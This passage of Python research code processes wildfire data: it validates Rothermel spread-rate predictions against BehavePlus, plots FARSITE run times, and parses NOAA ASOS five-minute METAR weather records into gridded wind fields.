allRosVectors = []
for i in range(1,allParams.values.shape[1]):
paramsRaw = allParams.values[:,i]
params = paramListTodict(paramsRaw)
directions, rosVectors = getROSfromParams(params)
allParams.append(orderParams(params))
allDirections.append(directions)
allRosVectors.append(rosVectors)
allParams = np.array(allParams).T
pd.DataFrame(allDirections).T.to_csv('../rothermelData/validationDirections.csv')
pd.DataFrame(allRosVectors).T.to_csv('../rothermelData/validationRosVectors.csv')
elif case == 3:
numToRepeat = 5
allParams = pd.read_csv('../rothermelData/validationInputs.csv')
paramsRaw = allParams.values[:,numToRepeat]
params = paramListTodict(paramsRaw)
directions, rosVectors = getROSfromParams(params,toPrint=True)
behaveResults = pd.read_csv('../rothermelData/validationBehaveOutputs.csv')
behaveDirections = behaveResults.values[:,0]
behaveRos = behaveResults.values[:,numToRepeat]
rosVectorsResample = np.interp(behaveDirections,directions,rosVectors)
rmse = np.mean((rosVectorsResample-behaveRos)**2)**0.5
plt.figure(figsize=(4,4))
plt.plot(directions,rosVectors,label='prediction')
plt.plot(behaveDirections,behaveRos,label='behavePlus')
plt.legend()
ylim = [min([np.min(rosVectors),np.min(behaveRos),0]),max([np.max(rosVectors),np.max(behaveRos),1.0])]
plt.ylim(ylim)
plt.title(str(numToRepeat)+': '+str(np.round(rmse,2)))
elif case == 4:
behaveResults = pd.read_csv('../rothermelData/validationBehaveOutputs.csv')
behaveDirections = behaveResults.values[:,0]
allDirections = pd.read_csv('../rothermelData/validationDirections.csv')
allRosVectors = pd.read_csv('../rothermelData/validationRosVectors.csv')
rmses = []
toPlot = True
for i in range(1,51):
behaveRos = behaveResults.values[:,i]
directions = allDirections.values[:,i]
rosVectors = allRosVectors.values[:,i]
rosVectorsResample = np.interp(behaveDirections,directions,rosVectors)
rmse = np.mean((rosVectorsResample-behaveRos)**2)**0.5
rmses.append(rmse)
if toPlot:
plt.figure(figsize=(4,4))
plt.plot(directions,rosVectors,label='prediction')
plt.plot(behaveDirections,behaveRos,label='behavePlus')
plt.legend()
ylim = [min([np.min(rosVectors),np.min(behaveRos),0]),max([np.max(rosVectors),np.max(behaveRos),1.0])]
plt.ylim(ylim)
plt.title(str(i)+': '+str(np.round(rmse,2)))
elif case == 5:
outdir = '../rothermelData/'
nsbase = outdir+'data'
modelIndexDict = determineFastestModel()
datasIn = []
datasOut = []
i = 0
k = 0
t1 = uc.tic()
while i <= 0:
#for i in range(0,4000):
params = getRandomConditions(paramsInput,allowDynamicModels=True)
if i == 0:
params['aspect'] = 160
params['model'] = 'FM1'
params['slope'] = 0.805
params['m1h'] = 5.26
params['m10h'] = 6.26
params['m100h'] = 7.26
params['lhm'] = 69
params['lwm'] = 49
params['canopyCover'] = 0.7
params['canopyHeight'] = 14
params['crownRatio'] = 0.2
params['windDir'] = 34
params['windSpeed'] = 13.5
directions, rosVectors = getROSfromParams(params,toPrint=False)
params['modelInd'] = modelIndexDict[params['model']]
if True:
fireImages, modelInputs = visualizeInputImgs(directions,rosVectors,params,resX=resX,resY=resY,toPlot=False)
for j in range(0,len(fireImages)-1):
data = [fireImages[j]]
data.extend(modelInputs)
datasIn.append(rearrangeDatas(data))
datasOut.append(rearrangeDatas([fireImages[j+1]]))
if i % 1000 == 0 and False:
datasIn = np.squeeze(datasIn)
datasOut = np.squeeze(datasOut)
uc.dumpPickle([datasIn,datasOut],outdir+'dataRemakeTest'+str(len(datasOut))+'_'+str(k)+'.pkl')
datasIn = []
datasOut = []
k = k + 1
i = i + 1
print(uc.toc(t1))
#assert False, "Stopped"
#uc.dumpPickle([datasIn,datasOut],outdir+'dataBehaveMoist'+str(len(datasOut))+'_'+str(k)+'.pkl')
imgFire = visualizeInputValues(directions,rosVectors,params,resX=resX,resY=resY)
elif case == 6:
import glob
outdir = '../rothermelData/'
dataFile = outdir+'dataBehaveMoist3000'
files = glob.glob(dataFile+'*.pkl')
ns = outdir+'behaveMoistData'
allIn = []
allOut = []
for i in range(0,len(files)):
[inData,outData] = uc.readPickle(files[i])
allIn.extend(inData)
allOut.extend(outData)
datas = (inData,outData)
elif case == 7:
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
networkRaw = np.loadtxt('exampleNetworkRaw0.csv',delimiter=',')
networkProcessed = np.loadtxt('exampleNetworkProcessed0.csv',delimiter=',')
fs = 16
fig, ax = plt.subplots(figsize=(16,8))
a = []
lims = [[-30,30],[-20,20],[-20,20],[30,150],[30,150],[0,30],[0,30],[0,30],[0,1],[0,20],[0,1],[0,53]]
names = ['Elevation','East Wind','North Wind','Live Herbaceous Moisture','Live Woody Moisture','1-Hour Moisture','10-Hour Moisture','100-Hour Moisture','Canopy Cover','Canopy Height','Crown Ratio','Fuel Model']
textOffset = [0]
#modelInputs = [elevImg,windX,windY,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyCoverImg,canopyHeightImg,crownRatioImg,modelImg]
for i in range(len(modelInputs)-1,-1,-1):
img = modelInputs[i].copy()
img[-1,-1] = lims[i][0]
img[-1,-2] = lims[i][1]
oi = OffsetImage(img, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
a.append(ax.add_artist(box))
ax.annotate(names[i],xy=(-0.5*i-1.5,1*i-1.6),xycoords='data',textcoords='data',xytext=(-0.5*i-5-(len(names[i])-10)*0.1,1*i-1.525),arrowprops=dict(facecolor='black',shrink=0.05),fontsize=fs)
i = -1
fireImages[1][fireImages[1] == 255] = 1
#fireImages[1][-1,-1] = 2
norm = matplotlib.colors.Normalize(vmin=0, vmax=2)
oi = OffsetImage(fireImages[1], zoom = 2.0, cmap='hot_r',norm=norm)
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
ax.annotate('Initial Burn Map',xy=(-0.5*i-1.5,1*i-1.6),xycoords='data',textcoords='data',xytext=(-0.5*i-5,1*i-1.525),arrowprops=dict(facecolor='black',shrink=0.05),fontsize=fs)
a.append(ax.add_artist(box))
'''
oi = OffsetImage([[0,0],[0,0]], zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
ax.annotate('Initial Burn Map',xy=(-0.5*i-1.5,1*i-1.6),xycoords='data',textcoords='data',xytext=(-0.5*i-5,1*i-1.525),arrowprops=dict(facecolor='black',shrink=0.05),fontsize=fs)
a.append(ax.add_artist(box))
'''
i = 6# 6
imgX = 3.50
ax.annotate('',xy=(imgX,1*i),xycoords='data',textcoords='data',xytext=(imgX-2,1*i),arrowprops=dict(facecolor='black',shrink=0.01,width=50,headwidth=100,headlength=30))
ax.annotate('Convolutional\nNeural Network',xy=(imgX-0.9,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-2.5,1*i-2.85),fontsize=fs)
imgX = 5.5
i = 3
oi = OffsetImage(networkRaw, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (imgX,1*i), frameon=True)
ax.annotate('Probability of\nFire',xy=(imgX-0.8,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-1.1,1*i-2.85),fontsize=fs)
a.append(ax.add_artist(box))
imgX = 5.5
i = 10
oi = OffsetImage(1-networkRaw, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (imgX,1*i), frameon=True)
ax.annotate('Probability of\nNot Fire',xy=(imgX-0.8,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-1.1,1*i-2.85),fontsize=fs)
a.append(ax.add_artist(box))
i = 6# 6
imgX = 9.5
ax.annotate('',xy=(imgX,1*i),xycoords='data',textcoords='data',xytext=(imgX-2,1*i),arrowprops=dict(facecolor='black',shrink=0.01,width=50,headwidth=100,headlength=30))
ax.annotate('Post Processing',xy=(imgX-1.1,1*i-1.4),xycoords='data',textcoords='data',xytext=(imgX-2.25,1*i-2.85),fontsize=fs)
imgX = 11.5
i = 6
oi = OffsetImage(networkProcessed, zoom = 2.0, cmap='hot_r')
box = AnnotationBbox(oi, (imgX,1*i), frameon=True)
ax.annotate('Burn Map\nAfter 6 Hours',xy=(imgX-1.5,1*i-0.9),xycoords='data',textcoords='data',xytext=(imgX-1.15,1*i-2.85),fontsize=fs)
a.append(ax.add_artist(box))
plt.ylim(-2.6,12.5)
plt.xlim(-10,12.5)
#plt.ylim(-50,50)
plt.axis('off')
plt.tight_layout()
plt.savefig('..%soutputs%sinputsExampleSingleFire.eps'%(os.sep, os.sep))
makeFirePerimetersFigure(imgFire)
```
#### File: datadriven-wildfire-spread/scripts/checkFARSITErunTime.py
```python
import glob
import matplotlib.pyplot as plt
import numpy as np
def getTime(file):
with open(file,'r') as f:
lines = f.readlines()
simTime = -1
for line in lines:
if 'Total Farsite Run Time' in line:
simTime = float(line.split()[4])
return simTime
if __name__ == "__main__":
inDir = "E://projects//wildfire-research//farsite//data//"
files = glob.glob(inDir+"*_Timings.txt")
simTimes = []
for i in range(0,len(files)):
simTime = getTime(files[i])
simTimes.append(simTime)
simTimes = np.array(simTimes)
simTimes2 = simTimes.copy()
simTimes2 = simTimes2[simTimes2>60]
simTimes2 = simTimes2[simTimes2<3600*10]
simTimeMean = np.mean(simTimes2)
simTimeStd = np.std(simTimes2)
plt.figure(figsize=(12,12))
fs = 32
lw = 3
plt.hist(simTimes/3600,bins=10000,cumulative=True,density=True,histtype='step',linewidth=lw)
plt.xlim(0,6)
plt.xlabel('FARSITE computational time (hours)',fontsize=fs)
plt.ylabel('Cumulative Probability',fontsize=fs)
plt.tick_params(labelsize=fs)
plt.tight_layout()
plt.savefig('wfsm_farsiteCompTime.pdf',dpi=300)
```
#### File: datadriven-wildfire-spread/scripts/parse_asos_file.py
```python
import numpy as np
import datetime as dt
import math
#from matplotlib.mlab import griddata
from scipy.interpolate import griddata
import glob
import pickle
import sys
import util_common as uc
class ASOSMeasurementList(object):
''' This class contains a list of ASOS measurements
'''
__slots__ = ['dateTime','temperatureC','relativeH','directionDeg','speedMps','gustMps']
def __init__(self):
self.dateTime = []
self.temperatureC = []
self.relativeH = []
self.directionDeg = []
self.speedMps = []
self.gustMps = []
def addTime(self,dateTime,temperatureC,relativeH,directionDeg,speedMps,gustMps):
''' This function adds a measurement time
'''
self.dateTime.append(dateTime)
self.temperatureC.append(temperatureC)
self.relativeH.append(relativeH)
self.directionDeg.append(directionDeg)
self.speedMps.append(speedMps)
self.gustMps.append(gustMps)
class ASOSStation(object):
''' This class contains meta-data information for an ASOS station and lists
of ASOS measurements.
'''
__slots__ = ['latitude','longitude','name','call',
'dateTime','temperatureC','relativeH','directionDeg','speedMps','gustMps',
#'ncdcid','wban','coopid','aname','country','state','county','elevation','utc','stntype',
]
def __init__(self,info):
self.call = info[3]
self.name = info[4]
self.latitude = info[9]
self.longitude = info[10]
#self.ncdcid = info[0]
#self.wban = info[1]
#self.coopid = info[2]
#self.aname = info[5]
#self.country = info[6]
#self.state = info[7]
#self.county = info[8]
#self.elevation = info[11]
#self.utc = info[12]
#self.stntype = info[13]
self.temperatureC = [] # List of temperature measurements in deg C
self.relativeH = [] # List of relative humidity measurements
self.directionDeg = [] # List of wind direction in degrees
self.speedMps = [] # List of wind speed measurements in m/s
self.gustMps = [] # List of wind gust speed measurements in m/s
self.dateTime = [] # List of time stamps
def computeMemory(self):
''' This function calculates the memory requirements of the object
'''
mem = 0
slots = self.__slots__
for key in slots:
mem = mem + sys.getsizeof(getattr(self,key))/1024**2
return mem
def __str__(self):
''' This function prints summary information of the object when a
string is requested.
'''
string = "%s ASOS Station\n"%(self.name)
string = string + "\tTotal measurements:\t%.0f\n"%(len(self.dateTime))
string = string + "\tEarliest dateTime:\t%s\n"%(min(self.dateTime))
string = string + "\tLatest dateTime:\t%s\n"%(max(self.dateTime))
return string
def __repr__(self):
''' This function prints summary information of the object when a
string is requested.
'''
return self.__str__()
def addTime(self,data):
''' This function adds a measurement time to the object
'''
self.temperatureC.extend(data.temperatureC)
self.relativeH.extend(data.relativeH)
self.directionDeg.extend(data.directionDeg)
self.speedMps.extend(data.speedMps)
self.gustMps.extend(data.gustMps)
self.dateTime.extend(data.dateTime)
def timeAverage(self,timeRange):
''' This function calculates the average measurement during a time
interval.
'''
dateTimeNp = []
for i in self.dateTime:
dateTimeNp.append(np.datetime64(i))
dateTimeNp = np.array(dateTimeNp)
deltaTimeNp = np.array(dateTimeNp-dateTimeNp[0],dtype=np.float32)
deltaTimeNp = deltaTimeNp/(10**6*3600)
temperatureC = np.array(self.temperatureC,dtype=np.float32)
relativeH = np.array(self.relativeH,dtype=np.float32)
directionDeg = np.array(self.directionDeg,dtype=np.float32)
speedMps = np.array(self.speedMps,dtype=np.float32)
gustMps = np.array(self.gustMps,dtype=np.float32)
dataNp = np.array([deltaTimeNp,temperatureC,relativeH,directionDeg,speedMps,gustMps],dtype=np.float32).T
dataNp = nanInterp(dataNp.copy())
deltat = 2*(timeRange.days*24+(0+(timeRange.seconds+timeRange.microseconds/10**6)/60)/60)
maxt = np.floor(np.max(dataNp[:,0]))
mint = np.min(dataNp[:,0])
t = np.linspace(mint,maxt,int((maxt-mint)/deltat+1))
dataNpI = np.zeros((len(t),dataNp.shape[1]),dtype=np.float32)
dataNpI[:,0] = t
dateTime = []
basetime = min(self.dateTime)
for i in range(1,dataNp.shape[1]):
dataNpI[:,i] = np.interp(t,dataNp[:,0],dataNp[:,i])
for i in range(0,dataNpI.shape[0]):
dateTime.append(dt.timedelta(hours=int(dataNpI[i,0]))+basetime)
self.dateTime = dateTime
self.temperatureC = dataNpI[:,1]
self.relativeH = dataNpI[:,2]
self.directionDeg = dataNpI[:,3]
self.speedMps = dataNpI[:,4]
self.gustMps = dataNpI[:,5]
return dataNp
def findTime(self,queryDateTime):
''' This function returns the index of the best matching time in the
database to the query time.
'''
bestMatchValue = min(self.dateTime, key=lambda d: abs(d-queryDateTime))
bestMatchIndex = self.dateTime.index(bestMatchValue)
return bestMatchIndex
def extractTimeAverage(self,queryDateTime,timeRange):
''' This function extracts the time average centered at a query time
with a delta time range specified.
'''
def list2avg(dataL,inds):
dataNp = np.array(dataL)
dataNp[np.equal(dataNp,None)] = np.nan
dataNp = np.array(dataNp,dtype=np.float32)
if not np.all(np.isnan(dataNp[inds[0]:inds[1]])):
data = np.nanmean(dataNp[inds[0]:inds[1]])
return data
else:
return np.nan
bestLowValue = min(self.dateTime, key=lambda d: abs(d-(queryDateTime-timeRange)))
bestHighValue = min(self.dateTime, key=lambda d: abs(d-(queryDateTime+timeRange)))
bestLowIndex = self.dateTime.index(bestLowValue)
bestHighIndex = self.dateTime.index(bestHighValue)
bestMatchValue = min(self.dateTime, key=lambda d: abs(d-(queryDateTime)))
bestMatchIndex = self.dateTime.index(bestMatchValue)
temperatureC = list2avg(self.temperatureC,[bestLowIndex,bestHighIndex+1])
relativeH = list2avg(self.relativeH,[bestLowIndex,bestHighIndex+1])
directionDeg = list2avg(self.directionDeg,[bestLowIndex,bestHighIndex+1])
speedMps = list2avg(self.speedMps,[bestLowIndex,bestHighIndex+1])
gustMps = list2avg(self.gustMps,[bestLowIndex,bestHighIndex+1])
return np.array([queryDateTime,temperatureC,relativeH,directionDeg,speedMps,gustMps])
def sortMeasurements(self):
''' This function will sort the measurements in the database in
ascending order based on acquisition time.
'''
self.temperatureC = [x for _, x in sorted(zip(self.dateTime,self.temperatureC), key=lambda pair: pair[0])]
self.relativeH = [x for _, x in sorted(zip(self.dateTime,self.relativeH), key=lambda pair: pair[0])]
self.directionDeg = [x for _, x in sorted(zip(self.dateTime,self.directionDeg), key=lambda pair: pair[0])]
self.speedMps = [x for _, x in sorted(zip(self.dateTime,self.speedMps), key=lambda pair: pair[0])]
self.gustMps = [x for _, x in sorted(zip(self.dateTime,self.gustMps), key=lambda pair: pair[0])]
self.dateTime.sort()
def convertKnots(speedKnot):
''' This function will convert a wind speed in knots to m/s
'''
if speedKnot is not None:
speedMps = speedKnot*0.514444
else:
speedMps = None
return speedMps
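# Hedged example (not part of the original script): one knot is 0.514444 m/s,
# so convertKnots(10.0) returns roughly 5.14 m/s; a None input is passed
# through as None.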
def findGeoLimits(stations):
''' This function will find the extents of latitude and longitude covered
by stations in the database.
'''
minLatitude = 360
maxLatitude = -360
minLongitude = 360
maxLongitude = -360
for key, value in stations.items():
if value.latitude < minLatitude:
minLatitude = value.latitude
if value.latitude > maxLatitude:
maxLatitude = value.latitude
if value.longitude < minLongitude:
minLongitude = value.longitude
if value.longitude > maxLongitude:
maxLongitude = value.longitude
return [minLatitude,maxLatitude,minLongitude,maxLongitude]
def stationsSortMeasurements(stations):
''' This function will call each station in the database and sort the
measurements in ascending order by acquisition time.
'''
for key, value in stations.items():
value.sortMeasurements()
return stations
def convertVector(speedMps,directionDeg):
''' This function will convert wind speed measurements from polar
coordinates to Cartesian coordinates.
'''
if directionDeg == -1:
speedX = speedMps/(2**0.5)
speedY = speedMps/(2**0.5)
elif directionDeg is None:
print("Wind direction was not set.")
speedX, speedY = np.nan, np.nan
elif speedMps is None:
print("Wind speed was not set.")
speedX, speedY = np.nan, np.nan
else:
try:
speedX = speedMps*np.sin(directionDeg/180*math.pi)
speedY = speedMps*np.cos(directionDeg/180*math.pi)
except:
assert False, "Unknown wind vector: %s Mps %s Deg" % (str(speedMps),str(directionDeg))
return speedX, speedY
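# Hedged usage sketch (illustrative only, not part of the original script):
# with this convention a 10 m/s wind at 90 degrees decomposes into roughly
# (10, 0) as (east, north) components, e.g.
#   speedX, speedY = convertVector(10.0, 90.0)
# and a direction of -1 (variable wind) splits the speed evenly between the
# two components.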
def getStationsMeasurements(stations,queryDateTime,timeRange):
''' This function will return the average measurements from a specified
query time and time range for each station.
'''
measurements = []
for key, value in stations.items():
data = value.extractTimeAverage(queryDateTime,timeRange)
directionDeg = data[3]
speedMps = data[4]
speedX, speedY = convertVector(speedMps,directionDeg)
measurements.append([value.latitude,value.longitude,speedX,speedY])
measurements = np.array(measurements)
return measurements
def defineStations(filename):
''' This function reads the meta-data for each station from an input
file. Input file obtained from: https://www.ncdc.noaa.gov/homr/reports
'''
def str2Int(s):
s = s.strip()
return int(s) if s else np.nan
with open(filename) as f:
content = f.readlines()
stations = dict()
for line in content:
if "NCDCID" not in line and '-------- ----- ------ ----' not in line:
NCDCID = str2Int(line[0:8].strip())
WBAN = str2Int(line[9:14].strip())
COOPID = str2Int(line[15:21].strip())
CALL = line[22:26].strip()
NAME = line[27:57].strip()
ANAME = line[58:88].strip()
COUNTRY = line[89:109].strip()
ST = line[110:112].strip()
COUNTY = line[113:143].strip()
LAT = float(line[144:153].strip())
LON = float(line[154:164].strip())
ELEV = float(line[165:171].strip())
UTC = float(line[172:177].strip())
STNTYPE = line[178:-1].strip()
if ST == 'CA' or ST == 'AZ' or ST == 'OR' or ST == 'NV':
stCheck = True
else:
stCheck = False
if CALL not in stations and stCheck:
stations[CALL] = ASOSStation([NCDCID,WBAN,COOPID,CALL,NAME,ANAME,COUNTRY,ST,COUNTY,LAT,LON,ELEV,UTC,STNTYPE])
#if CALL in stations:
# stations[CALL].addTime(splitLine)
#else:
# stations[CALL] = ASOSStation(splitLine)
# stations[CALL].addTime(splitLine)
return stations
def parseMETARline(line,debug=False):
''' This function will read a single METAR line and return air
temperature, relative humidity, wind direction, wind speed, gust speed,
and time information.
NOTE: The input METAR files were obtained from:
ftp://ftp.ncdc.noaa.gov/pub/data/asos-fivemin/
NOTE: Not all measurements are published for every METAR station. Missing
measurements are returned as None.
NOTE: The lines in the file tend not to follow the format specified
by NOAA in the Automated Surface Observing System User's
Guide. When parts of a line cannot be determined, None is returned for
that measurement; the remaining measurements are still parsed when possible.
'''
line_split = line.split(' ')
start_index = line_split.index('5-MIN') if '5-MIN' in line_split else -1
if start_index == -1:
print("Unable to find 5-MIN string to start parsing:") if debug else -1
print(line) if debug else -1
return None
end_index = line_split.index('RMK') if 'RMK' in line_split else -1
line_split = line_split[start_index+1:end_index]
filecall = line_split[0]
if line_split[1][0:-1].isdigit() and len(line_split[1]) == 7:
pass
day = int(line_split[1][0:2])
hour = int(line_split[1][2:4])
minute = int(line_split[1][4:6])
else:
return None
#data.auto = False
sm = 0
#data.sky_condition = []
#data.weather_condition = []
temperatureC = None
relativeH = None
directionDeg = None
speedMps = None
gustMps = None
#data.temperature_dew = 'M'
line_split = [x for x in line_split if x]
for i in range(2,len(line_split)):
if line_split[i] == 'AUTO':
#data.auto = True
pass
elif 'KT' in line_split[i]:
filewind = line_split[i].split('KT')[0]
if 'G' in filewind:
if filewind.split('G')[1].isdigit():
gustMps = convertKnots(float(filewind.split('G')[1]))
else:
print("Failed to parse wind gust:") if debug else -1
print(line) if debug else -1
filewind = filewind.split('G')[0]
if 'VRB' in filewind:
filewind = filewind.split('VRB')[1]
directionDeg = -1
else:
try:
directionDeg = float(filewind[0:3])
except:
print("Error parsing direction.") if debug else -1
print(line) if debug else -1
try:
speedMps = convertKnots(float(filewind[-2:]))
except:
print("Error parsing windspeed.") if debug else -1
print(line) if debug else -1
elif 'V' in line_split[i] and len(line_split[i]) == 7 and 'KT' in line_split[i-1]:
#data.directionDegVar = [float(line_split[i][0:3]),float(line_split[i][4:])]
pass
elif 'SM' in line_split[i]:
linesm = line_split[i].split('SM')[0]
try:
if linesm[0] == 'M':
linesm = linesm[1:]
except:
print(line_split[i]) if debug else -1
if '/' in linesm:
if linesm.split('/')[0].isdigit() and linesm.split('/')[1].isdigit():
sm += float(linesm.split('/')[0])/float(linesm.split('/')[1])
else:
print("Error parsing visibility:") if debug else -1
print(line) if debug else -1
else:
try:
sm += float(linesm)
except:
print("Error parsing visibility:") if debug else -1
print(line) if debug else -1
elif line_split[i][0] == 'R' and len(line_split[i]) >= 10:
if line_split[i][-2:] == 'FT':
#data.rvr = line_split[i]
pass
elif ('BKN' in line_split[i] or 'CLR' in line_split[i]
or 'FEW' in line_split[i] or 'SCT' in line_split[i]
or 'OVC' in line_split[i]):
#data.sky_condition.append([line_split[i][0:3],line_split[i][3:]])
pass
elif ('RA' in line_split[i] or 'SN' in line_split[i]
or 'UP' in line_split[i] or 'FG' in line_split[i]
or 'FZFG' in line_split[i] or 'BR' in line_split[i]
or 'HZ' in line_split[i] or 'SQ' in line_split[i]
or 'FC' in line_split[i] or 'TS' in line_split[i]
or 'GR' in line_split[i] or 'GS' in line_split[i]
or 'FZRA' in line_split[i] or 'VA' in line_split[i]):
#data.weather_condition.append(line_split[i])
pass
elif line_split[i][0] == 'A' and len(line_split[i]) == 5:
try:
altimeter = float(line_split[i][1:])
except:
print("Error parsing altitude.") if debug else -1
print(line) if debug else -1
elif '/' in line_split[i] and len(line_split[i]) == 5: #data.temperatureC == None:
linetemp = line_split[i].split('/')
temperature_air_sign = 1
temperature_dew_sign = 1
if 'M' in linetemp[0]:
temperature_air_sign = -1
linetemp[0] = linetemp[0].split('M')[1]
if 'M' in linetemp[1]:
temperature_dew_sign = -1
linetemp[1] = linetemp[1].split('M')[1]
if linetemp[0].isdigit():
temperatureC = float(linetemp[0])*temperature_air_sign
if linetemp[1].isdigit():
#data.temperature_dew = float(linetemp[1])*temperature_dew_sign
temperatureDew = float(linetemp[1])*temperature_dew_sign
pass
if linetemp[0].isdigit() and linetemp[1].isdigit():
#data.relativeH = 100-5*(data.temperatureC-data.temperature_dew)
relativeH = 100-5*(temperatureC-temperatureDew)
else:
if i < len(line_split)-1:
if 'SM' in line_split[i+1] and '/' in line_split[i+1] and line_split[i].isdigit():
try:
sm += float(line_split[i])
except:
print(line) if debug else -1
print(line_split) if debug else -1
else:
pass
#print('Unknown argument %s at %.0f.' % (line_split[i],0))
else:
pass
#print('Unknown argument %s at %.0f.' % (line_split[i],1))
if sm == 0:
#data.sm = None
pass
else:
#data.sm = sm
pass
return [temperatureC,relativeH,directionDeg,speedMps,gustMps], [day,hour,minute]
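# Hedged sketch (illustrative only): a minimal call looks like
#   vals, times = parseMETARline(line)
# where line is one raw 5-minute record containing the '5-MIN' marker, e.g.
#   '... 5-MIN KXYZ 170553Z 28012G18KT 10SM 16/12 A3002 RMK ...'
# (the station, time, and wind groups above are made up for illustration).
# vals is [temperatureC, relativeH, directionDeg, speedMps, gustMps] and times
# is [day, hour, minute]; measurements that cannot be parsed come back as None.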
def parseMETARfile(file):
''' This function will load data from an input METAR file.
'''
dateTimes = []
datas = ASOSMeasurementList()
with open(file) as f:
old_day = 0
content = f.readlines()
if content is not None:
#print(len(content))
i = 0
for line in content:
data = None
times = None
try:
data, times = parseMETARline(line)
except:
print("Failed to parse the METAR line in file %s line %.0f."%(file,i))
if times is None:
# skip lines that could not be parsed
i = i+1
continue
day = times[0]
hour = times[1]
minute = times[2]
if data is not None:
year = int(file[-10:-6])
month = int(file[-6:-4])
if day < old_day:
month = month + 1
if month > 12:
month = 1
year = year + 1
old_day = day
dateTime = dt.datetime(year=year,month=month,day=day,hour=hour,minute=minute)
datas.addTime(dateTime,data[0],data[1],data[2],data[3],data[4])
i = i+1
return datas, dateTimes
def readStationsFromText(filename='../data-test/asos-stations.txt',
datadirs=['G:/WildfireResearch/data/asos-fivemin/6401-2016/'],
timeRange = dt.timedelta(days=0,hours=0,minutes=30)):
''' This function will generate a list of ASOSStations which contain
all the measurements found in the list of directories contained in
datadirs. The timeRange option determines what temporal range to use in
averaging.
'''
stations = defineStations(filename)
empty_stations = []
totalMem = 0
keys = list(stations.keys())
for i in range(0,len(keys)):#key in stations.keys():
key = keys[i]
call = stations[key].call
files = []
for datadir in datadirs:
fs = glob.glob(datadir+'*'+call+'*')
files.extend(fs)
if len(files) != 0:# and key == 'WVI':
for file in files:
data, dateTime = parseMETARfile(file)
stations[key].addTime(data)
#stations[key].addTime(data)
stations[key].dateTime.extend(dateTime)
localMem = stations[key].computeMemory()
_ = stations[key].timeAverage(timeRange)
reducMem = stations[key].computeMemory()
totalMem = totalMem+reducMem
print("Station %s\n\tRaw memory:\t%.04f MB\n\tReduced Memory:\t%0.4f MB\n\tTotal Memory:\t%.04f MB"%(key,localMem,reducMem,totalMem))
else:
empty_stations.append(key)
print("%s was empty."%(key))
print("Percent complete: %.4f"%((i+1)/len(keys)))
for key in empty_stations:
stations.pop(key,None)
for key in stations:
stations[key].sortMeasurements()
print("Finished %s, total Memory: %0.4f MB"%(key,computeStationsMemory(stations,printSummary=False)))
return stations
def dumpPickleStations(stations,filename='../data-test/asos-stations.pkl'):
''' This function will dump a stations file to pickle
'''
with open(filename,'wb') as f:
pickle.dump(stations,f)
def readPickleStations(filename='../data-test/asos-stations.pkl'):
''' This function will read a stations file from pickle
'''
with open(filename,'rb') as f:
stations = pickle.load(f)
return stations
def computeStationsMemory(stations,printSummary=True):
''' This function will calculate the total memory used by a list of
stations.
'''
mem = 0
for station in stations:
mem2 = stations[station].computeMemory()
print("Station %s Memory %.4f"%(station,mem2))
mem = mem+mem2
print("Total Memory: %0.4f MB"%(mem)) if printSummary else -1
return mem
def nanInterp(data):
''' This function will interpolate nan values in a dataset.
'''
x = data[:,0]
for i in range(1,len(data[0,:])):
y = data[:,i]
nans = ~np.isfinite(y) # boolean mask, so ~nans selects the finite entries
y[nans] = np.nan
data[nans,i] = np.interp(x[nans],x[~nans],y[~nans])
return data
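# Hedged example (illustrative only): a column value that is NaN is filled in
# from its finite neighbours using the first column as the x axis, e.g.
#   nanInterp(np.array([[0., 1.], [1., np.nan], [2., 3.]]))
# returns [[0., 1.], [1., 2.], [2., 3.]].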
def buildCoordinateGrid(stations,resolution=111):
''' This function will build a latitude and longitude grid using the
limits of the station file at the resolution specified in pixels per
degree of latitude and longitude.
NOTE: 1 degree is approximately 69 miles, or 111 km
NOTE: Modis resolution is approximately 1km
NOTE: Thus, 111 pixels per degree will match modis resolution
'''
geoLimits = findGeoLimits(stations)
latGrid = np.linspace(geoLimits[0]-1,geoLimits[1]+1,int((geoLimits[1]-geoLimits[0]+2)*resolution+1))
lonGrid = np.linspace(geoLimits[2]-1,geoLimits[3]+1,int((geoLimits[3]-geoLimits[2]+2)*resolution+1))
return latGrid, lonGrid
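# Hedged worked example (illustrative only): at the default 111 pixels per
# degree, a station set spanning 10 degrees of latitude produces a latitude
# axis of (10 + 2) * 111 + 1 = 1333 points, the +2 coming from the one degree
# of padding added on each side of the limits.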
def getSpeedContours(measurements,lat,lon):
''' This function will build a contour map of measurements using point
measurements at known latitude and longitudes.
'''
if True:
speedXcontour = griddata(measurements[:,:2][:,::-1],measurements[:,2], (lon, lat), method='linear').T
speedYcontour = griddata(measurements[:,:2][:,::-1],measurements[:,3], (lon, lat), method='linear').T
else:
speedXcontour = griddata(measurements[:,0],measurements[:,1],measurements[:,2],lat,lon,method='linear').T
speedYcontour = griddata(measurements[:,0],measurements[:,1],measurements[:,3],lat,lon,method='linear').T
return speedXcontour, speedYcontour
def queryWindSpeed(queryDateTime,
filename='../data-test/asos-stations.pkl',
resolution=111,
timeRange = dt.timedelta(days=0,hours=0,minutes=30)):
''' This is the function which is called to query wind speed at a
specific time.
'''
stations = readPickleStations(filename=filename)
lat, lon = buildCoordinateGrid(stations,resolution=resolution)
measurements = getStationsMeasurements(stations,queryDateTime,timeRange)
lon, lat = np.meshgrid(lon,lat)
speedX, speedY = getSpeedContours(measurements,lat,lon)
return lat, lon, speedX, speedY
if __name__ == "__main__":
''' Example cases:
case 0: Load raw data, dump raw data, plot data at query time
case 1: Load pickled data, compute memory requirements
case 2: Load pickled data, plot data at query time
'''
case = 2
filename = '../data-test/asos-stations.txt'
datadirs=['G:/WildfireResearch/data/asos-fivemin/6401-2016/',
'G:/WildfireResearch/data/asos-fivemin/6401-2017/']
resolution = 111 # pixels per degree
queryDateTime = dt.datetime(year=2016,month=6,day=17,hour=5,minute=53)
timeRange = dt.timedelta(days=0,hours=0,minutes=30)
if case == 0:
stations = readStationsFromText(filename=filename,datadirs=datadirs)
dumpPickleStations(stations,filename=filename[0:-4]+'.pkl')
